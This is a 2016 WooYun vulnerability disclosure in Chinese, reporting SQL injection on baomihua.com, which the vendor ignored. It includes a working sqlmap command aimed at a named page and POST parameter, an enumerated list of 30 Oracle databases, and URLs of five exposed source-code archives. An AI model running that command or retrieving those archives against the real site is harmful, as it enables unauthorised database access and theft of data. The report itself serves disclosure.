当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188855

漏洞标题:爆米花主站SQL注入(POST涉及30个数据库可垮裤主库2400多个表)

相关厂商:爆米花网

漏洞作者: 黑色键盘丶

提交时间:2016-03-25 11:33

修复时间:2016-03-30 11:40

公开时间:2016-03-30 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-25: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点:F:\sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs


数据库30个 可裤裤查询

back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY


当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

123.png


数据库SYS也跑了下 976张表

111.png


数据库OLAPSYS 126张表

111.png


跑了几个数据量大的库证明下危害 表的话要好几天就不深入了
还有几处源代码泄露的

1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar


导致敏感信息泄露配置文件等等 艾米直播网站的

121.png


邮箱服务器信息

21.png


数据库配置信息

123.png


这边没装打不开配置文件

123.png


漏洞证明:

注入点:F:\sqlmap>sqlmap.py -u "http://www.baomihua.com/space/RankAllList.aspx" --data "classid=774" --dbs


数据库30个 可裤裤查询

back-end DBMS: Oracle
available databases [30]:
[*] APEX_030200
[*] APPQOSSYS
[*] CHEAT
[*] CHENZH
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIGZ
[*] LINJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] POMOHO
[*] POMOHOMOBILE
[*] QINYM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] WUXG
[*] XDB
[*] XIAL
[*] ZHANGXL
[*] ZHAOLH
[*] ZLY


当前库POMOHO 2449个表 跑的实在太慢了2分钟一个表 跑了2小时才几十个表估算一下要80个小时才可以跑完 这里就证明下危害

123.png


数据库SYS也跑了下 976张表

111.png


数据库OLAPSYS 126张表

111.png


跑了几个数据量大的库证明下危害 表的话要好几天就不深入了
还有几处源代码泄露的

1:http://static.baomihua.com/doc.rar
2:http://show.baomihua.com/baomihua.tar.gz
3:http://resources.baomihua.com/swf.rar
4:http://reg.baomihua.com/reg.rar
5:http://pvstat.baomihua.com/wwwroot.rar


导致敏感信息泄露配置文件等等 艾米直播网站的

121.png


邮箱服务器信息

21.png


数据库配置信息

123.png


这边没装打不开配置文件

123.png


修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-30 11:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-03-25 18:44 | 黑色键盘丶 ( 普通白帽子 | Rank:398 漏洞数:144 | 哥,是孤独风中的一匹狼)

    要是有礼物就好啦 嘿嘿

  2. 2016-03-25 21:08 | Pzacker ( 实习白帽子 | Rank:54 漏洞数:19 | 逼胖胖)

    我也找到了,不知道是不是你发现的那个@黑色键盘丶

  3. 2016-03-25 21:13 | 黑色键盘丶 ( 普通白帽子 | Rank:398 漏洞数:144 | 哥,是孤独风中的一匹狼)

    @Pzacker o

  4. 2016-03-25 21:54 | Pzacker ( 实习白帽子 | Rank:54 漏洞数:19 | 逼胖胖)

    @黑色键盘丶 你找的是参数是class等额吗

  5. 2016-03-25 22:03 | Pzacker ( 实习白帽子 | Rank:54 漏洞数:19 | 逼胖胖)

    是class的那个参数的吗。、。。

  6. 2016-03-25 22:09 | 黑色键盘丶 ( 普通白帽子 | Rank:398 漏洞数:144 | 哥,是孤独风中的一匹狼)

    @Pzacker 哪个